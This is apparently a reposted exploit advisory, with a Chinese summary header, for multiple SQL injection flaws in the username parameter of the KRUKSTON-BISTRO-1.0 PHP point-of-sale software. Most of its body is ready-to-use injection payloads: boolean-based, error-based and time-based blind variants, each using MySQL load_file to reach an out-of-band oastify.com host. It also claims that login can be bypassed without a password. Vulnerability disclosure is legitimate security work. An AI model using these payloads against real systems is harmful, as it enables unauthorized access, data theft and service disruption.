KRUKSTON-BISTRO-1.0软件存在多个SQL注入漏洞。攻击者可通过用户名参数提交恶意payload,利用load_file函数读取外部文件或获取敏感信息。该漏洞可能导致未授权访问、系统崩溃或数据泄露。已提供验证视频链接。 2025-5-27 17:37:6 Author: cxsecurity.com(查看原文) 阅读量:9 收藏
KRUKSTON-BISTRO-1.0 Multiple-SQLi
# Titles: KRUKSTON-BISTRO-1.0 Multiple-SQLi # Author: nu11secur1ty # Date: 05/27/2025 # Vendor: https://www.mayurik.com/ # Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html # Reference: https://portswigger.net/web-security/sql-injection ## Description: The username parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\9v5dite7wz9iuiaxp8wlv631nstlhcl0c30vnlba.oastify.com\\opp'))+' was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all sensitive information from this system when he attacks it online, He can login super easily WITHOUT PASSWORD - ONLY USER - bypassing, and can crash or get every sensitive information from him! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: - SQLi: ```SQLi --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: [email protected]'+(select load_file('\\\\9v5dite7wz9iuiaxp8wlv631nstlhcl0c30vnlba.oastify.com\\opp'))+'' OR NOT 8325=8325 OR 'XTVm'='dUmZ&password=y5U!e4r!M5 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]'+(select load_file('\\\\9v5dite7wz9iuiaxp8wlv631nstlhcl0c30vnlba.oastify.com\\opp'))+'' AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0x7176786271,(SELECT (ELT(5030=5030,1))),0x71626b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'wWOB'='jaYC&password=y5U!e4r!M5 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]'+(select load_file('\\\\9v5dite7wz9iuiaxp8wlv631nstlhcl0c30vnlba.oastify.com\\opp'))+'' AND (SELECT 3736 FROM (SELECT(SLEEP(7)))vHYg) OR 'ywJb'='xvTf&password=y5U!e4r!M5 --- ``` # Reproduce: [href](https://www.youtube.com/watch?v=rxxuhDIjvuM) # Buy an exploit only: [href](Who cares) # Time spent: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh